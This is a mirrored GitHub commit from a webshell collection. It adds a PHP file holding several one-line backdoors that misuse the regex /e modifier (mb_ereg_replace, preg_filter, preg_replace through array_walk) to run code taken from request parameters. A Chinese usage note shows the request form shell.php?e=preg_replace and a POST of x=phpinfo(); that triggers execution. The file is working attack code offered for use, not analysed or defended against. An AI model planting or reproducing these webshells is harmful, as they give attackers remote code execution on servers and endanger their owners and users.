mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create 2020.08.20.14.php
This commit is contained in:
parent
44282fe412
commit
6a9169da6b
1 changed files with 28 additions and 0 deletions
28
php/2020.08.20.14.php
Normal file
28
php/2020.08.20.14.php
Normal file
|
@ -0,0 +1,28 @@
|
|||
<?php
|
||||
mb_ereg_replace('\d', $_REQUEST['x'], '1', 'e');
|
||||
?>
|
||||
|
||||
<?php
|
||||
preg_filter('|\d|e', $_REQUEST['x'], '2');
|
||||
?>
|
||||
|
||||
use like:
|
||||
|
||||
```
|
||||
|
||||
<?php
|
||||
$e = $_REQUEST['e'];
|
||||
$arr = array($_POST['x'] => '|.*|e',);
|
||||
array_walk($arr, $e, '');
|
||||
?>
|
||||
此时提交如下 payload 的话:
|
||||
|
||||
Php
|
||||
shell.php?e=preg_replace
|
||||
最后就相当于执行了如下语句:
|
||||
|
||||
Php
|
||||
preg_replace('|.*|e',$_POST['x'],'')
|
||||
这个时候只需要 POST x=phpinfo();
|
||||
|
||||
```
|
Loading…
Reference in a new issue